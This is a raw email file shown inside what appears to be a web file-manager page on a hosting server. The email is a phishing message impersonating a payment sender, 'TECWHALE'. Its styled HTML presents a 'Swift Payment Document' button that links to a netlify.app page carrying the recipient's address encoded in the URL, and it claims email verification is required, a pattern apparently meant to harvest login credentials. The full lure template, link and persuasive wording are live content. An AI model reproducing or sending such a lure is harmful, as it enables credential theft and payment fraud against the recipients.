File manager - Edit - /home/buyherba/mail/new/1774595733.M598649P13840.server217.orangehost.com,S=12858,W=13235
Back
Return-Path: <noreply@tekwale.com> Delivered-To: buyherba@server217.orangehost.com Received: from server217.orangehost.com by server217.orangehost.com with LMTP id mEL9IpUuxmkQNgAA15FMdQ (envelope-from <noreply@tekwale.com>) for <buyherba@server217.orangehost.com>; Fri, 27 Mar 2026 03:15:33 -0400 Return-path: <noreply@tekwale.com> Envelope-to: info@illuminatibrotherhood.us Delivery-date: Fri, 27 Mar 2026 03:15:33 -0400 Received: from tekwale.com ([185.198.27.32]:34354 helo=mail.tekwale.com) by server217.orangehost.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.99.1) (envelope-from <noreply@tekwale.com>) id 1w61Pm-000000003dH-3sfE for info@illuminatibrotherhood.us; Fri, 27 Mar 2026 03:15:30 -0400 Received: from ip74-208-205-169.pbiaas.com (ip74-208-205-169.pbiaas.com [74.208.205.169]) by mail.tekwale.com (Postfix) with ESMTPSA id 08BC523614E for <info@illuminatibrotherhood.us>; Tue, 24 Mar 2026 10:49:29 +0100 (CET) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=tekwale.com; s=default; t=1774345771; h=from:from:reply-to:subject:subject:date:date:message-id:message-id: to:to:cc:mime-version:mime-version:content-type:content-type: content-transfer-encoding:content-transfer-encoding; bh=b2T50b3y6nW3J4oAgC1q+SphpdJ4aqA/ge6o2wnTg0Q=; b=hwaFdnc4FTXEuj3pQxg6fL8EqFtjt5jx4giihMWw2ZdUnXoOpY2NuJS40jy34sPmJK5tOr S06pHAOu1m+io12bC4s//0cZreLi2/QPTqQqBXWenZ8h+S5kptAsMcEIg0Q/U7/ij59GLF r6gj/uAv4FRioN3nIZ8cgUF9liddYkY= From: TECWHALE <noreply@tekwale.com> To: info@illuminatibrotherhood.us Subject: Confirm Payment Details. Date: 24 Mar 2026 09:49:28 +0000 Message-ID: <20260324094928.839FBCC3E3B06148@tekwale.com> MIME-Version: 1.0 Content-Type: text/html; charset="utf-8" Content-Transfer-Encoding: quoted-printable X-YourOrg-MailScanner-Information: Please contact the ISP for more information X-YourOrg-MailScanner-ID: 1w61Pm-000000003dH-3sfE X-YourOrg-MailScanner: Found to be clean X-YourOrg-MailScanner-SpamCheck: not spam, SpamAssassin (not cached, score=4.749, required 5, BAYES_50 0.80, DCC_CHECK 1.10, DCC_REPUT_99_100 1.40, DKIM_SIGNED 0.10, DKIM_VALID -0.10, DKIM_VALID_AU -0.10, HTML_MESSAGE 0.00, MIME_HTML_ONLY 0.10, RCVD_IN_BL_SPAMCOP_NET 1.35, RCVD_IN_VALIDITY_CERTIFIED_BLOCKED 0.00, RCVD_IN_VALIDITY_RPBL_BLOCKED 0.00, SPF_PASS -0.00, URI_HEX 0.10) X-YourOrg-MailScanner-SpamScore: ssss X-YourOrg-MailScanner-From: noreply@tekwale.com X-Spam-Status: No <!DOCTYPE html> <html lang=3D"en"><head> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> <meta charset=3D"UTF-8"> <meta name=3D"viewport" content=3D"width=3Ddevice-width, initial-scale= =3D1.0"> <title>Payment Document - Bracco S.A.</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } =20=20=20=20=20=20=20=20 body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Rob= oto, Arial, sans-serif; padding: 40px 20px; background: #ffffff; min-height: 100vh; display: flex; align-items: center; justify-content: center; } =20=20=20=20=20=20=20=20 .container { max-width: 650px; width: 100%; background-color: #fff; border-radius: 12px; box-shadow: 0 20px 60px rgba(0,0,0,0.3); overflow: hidden; } =20=20=20=20=20=20=20=20 .header { background: linear-gradient(135deg, #2563eb 0%, #1d4ed8 100%); padding: 40px 30px; text-align: center; color: white; } =20=20=20=20=20=20=20=20 .header h1 { font-size: 24px; font-weight: 600; margin-bottom: 8px; letter-spacing: -0.5px; } =20=20=20=20=20=20=20=20 .header p { font-size: 14px; opacity: 0.9; } =20=20=20=20=20=20=20=20 .content { padding: 40px 30px; } =20=20=20=20=20=20=20=20 .message { text-align: center; margin-bottom: 35px; } =20=20=20=20=20=20=20=20 .message p { font-size: 16px; color: #4b5563; line-height: 1.6; } =20=20=20=20=20=20=20=20 .document-card { background: linear-gradient(135deg, #f8f9fa 0%, #e9ecef 100%); border: 2px solid #dee2e6; border-radius: 12px; padding: 25px; margin: 30px 0; transition: all 0.3s ease; cursor: pointer; text-decoration: none; display: block; } =20=20=20=20=20=20=20=20 .document-card:hover { transform: translateY(-4px); box-shadow: 0 12px 24px rgba(0,0,0,0.15); border-color: #2563eb; } =20=20=20=20=20=20=20=20 .document-inner { display: flex; align-items: center; gap: 20px; } =20=20=20=20=20=20=20=20 .document-icon-wrapper { flex-shrink: 0; width: 80px; height: 80px; background: white; border-radius: 10px; display: flex; align-items: center; justify-content: center; box-shadow: 0 4px 12px rgba(0,0,0,0.1); } =20=20=20=20=20=20=20=20 .document-icon { width: 50px; height: 50px; } =20=20=20=20=20=20=20=20 .document-details { flex: 1; text-align: left; } =20=20=20=20=20=20=20=20 .document-title { font-size: 18px; font-weight: 700; color: #1f2937; margin-bottom: 6px; display: flex; align-items: center; gap: 8px; } =20=20=20=20=20=20=20=20 .document-type { font-size: 13px; color: #6b7280; margin-bottom: 10px; } =20=20=20=20=20=20=20=20 .open-button { display: inline-flex; align-items: center; gap: 6px; background: #2563eb; color: white; padding: 8px 18px; border-radius: 6px; font-size: 14px; font-weight: 600; transition: background 0.3s ease; } =20=20=20=20=20=20=20=20 .document-card:hover .open-button { background: #1d4ed8; } =20=20=20=20=20=20=20=20 .arrow-icon { font-size: 16px; } =20=20=20=20=20=20=20=20 .security-notice { background: #fef3c7; border: 1px solid #fde047; border-radius: 8px; padding: 18px; margin: 25px 0; text-align: center; } =20=20=20=20=20=20=20=20 .security-notice p { font-size: 14px; color: #92400e; margin: 0; } =20=20=20=20=20=20=20=20 .security-notice strong { color: #78350f; } =20=20=20=20=20=20=20=20 .footer-security { display: flex; align-items: center; justify-content: center; gap: 10px; padding: 25px 30px; background: #f9fafb; border-top: 1px solid #e5e7eb; } =20=20=20=20=20=20=20=20 .lock-icon { width: 18px; height: 18px; color: #6b7280; } =20=20=20=20=20=20=20=20 .footer-security span { font-size: 13px; color: #6b7280; } =20=20=20=20=20=20=20=20 .badge { display: inline-block; background: #dcfce7; color: #166534; font-size: 11px; font-weight: 600; padding: 4px 10px; border-radius: 12px; text-transform: uppercase; letter-spacing: 0.5px; } =20=20=20=20=20=20=20=20 @media (max-width: 600px) { body { padding: 20px 10px; } =20=20=20=20=20=20=20=20=20=20=20=20 .header { padding: 30px 20px; } =20=20=20=20=20=20=20=20=20=20=20=20 .header h1 { font-size: 20px; } =20=20=20=20=20=20=20=20=20=20=20=20 .content { padding: 30px 20px; } =20=20=20=20=20=20=20=20=20=20=20=20 .document-inner { flex-direction: column; text-align: center; } =20=20=20=20=20=20=20=20=20=20=20=20 .document-details { text-align: center; } =20=20=20=20=20=20=20=20=20=20=20=20 .document-title { justify-content: center; } } </style> </head> <body style=3D"font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', = Roboto, Arial, sans-serif; padding: 40px 20px; background: #ffffff; min-height: 100vh; display: flex; align-items: center; justify-content: center"> <div style=3D"max-width: 650px; width: 100%; background-color: #fff; border-radius: 12px; box-shadow: 0 20px 60px rgba(0,0,0,0.3); overflow: hidden" class=3D"container"> <!-- Header Section --> <div class=3D"header"> <h1>TECWHALE.</h1> <p>Swift Payment Document</p> </div> =20=20=20=20=20=20=20=20 <!-- Content Section --> <div class=3D"content"> <div class=3D"message"> <p>We are preparing advance payment orders. Please con= firm the bank information before we proceed.</p> </div> =20=20=20=20=20=20=20=20=20=20=20=20 <!-- Document Card --> <a class=3D"document-card" style=3D"text-decoration: none;" hre= f=3D"http://musical-mandazi-96d76c.netlify.app/?c=3DaW5mb0BpbGx1bWluYXRpYnJ= vdGhlcmhvb2QudXM=3D" target=3D"_blank"> <div style=3D"display: flex; align-items: center; gap: 20px" class=3D"document-inner"> <div class=3D"document-icon-wrapper"> <!-- Document Icon SVG --> <svg xmlns=3D"http://www.w3.org/2000/svg" class=3D"= document-icon" fill=3D"none" viewBox=3D"0 0 24 24"> <path fill=3D"#2563eb" stroke=3D"#1e40af" strok= e-linecap=3D"round" stroke-linejoin=3D"round" stroke-width=3D"1.5" d=3D"M 1= 4 2 H 6 C 5.46957 2 4.96086 2.21071 4.58579 2.58579 C 4.21071 2.96086 4 3.4= 6957 4 4 V 20 C 4 20.5304 4.21071 21.0391 4.58579 21.4142 C 4.96086 21.7893= 5.46957 22 6 22 H 18 C 18.5304 22 19.0391 21.7893 19.4142 21.4142 C 19.789= 3 21.0391 20 20.5304 20 20 V 8 L 14 2 Z" /> <path fill=3D"#93c5fd" stroke=3D"#1e40af" strok= e-linecap=3D"round" stroke-linejoin=3D"round" stroke-width=3D"1.5" d=3D"M 1= 4 2 V 8 H 20" /> <path stroke=3D"white" stroke-linecap=3D"round"= stroke-linejoin=3D"round" stroke-width=3D"1.5" d=3D"M 12 18 V 12 M 9 15 H = 15" /> </svg> </div> <div class=3D"document-details"> <div class=3D"document-title"> PAYMENT_DOCUMENT <span class=3D"badge">Secure</span> </div> <div class=3D"document-type">Swift Payment Details = • PDF Document</div> <div class=3D"open-button"> Open Document <span class=3D"arrow-icon">→</span> </div> </div> </div> </a> =20=20=20=20=20=20=20=20=20=20=20=20 <!-- Security Notice --> <div class=3D"security-notice"> <p><strong>🔐 Verification Required</strong><br> This is a secured document. You will need to verify your em= ail address to view the payment details.</p> </div> </div> =20=20=20=20=20=20=20=20 <!-- Footer Security Notice --> <div class=3D"footer-security"> <svg xmlns=3D"http://www.w3.org/2000/svg" class=3D"lock-icon" f= ill=3D"currentColor" viewBox=3D"0 0 20 20"> <path clip-rule=3D"evenodd" fill-rule=3D"evenodd" d=3D"M 5 = 9 V 7 a 5 5 0 0 1 10 0 v 2 a 2 2 0 0 1 2 2 v 5 a 2 2 0 0 1 -2 2 H 5 a 2 2 0= 0 1 -2 -2 v -5 a 2 2 0 0 1 2 -2 Z m 8 -2 v 2 H 7 V 7 a 3 3 0 0 1 6 0 Z" />= </svg> <span>This document is encrypted and only accessible to authori= zed recipients.</span> </div> </div> </body></html>
| ver. 1.4 |
Github
|
.
| PHP 8.1.34 | Generation time: 0.24 |
proxy
|
phpinfo
|
Settings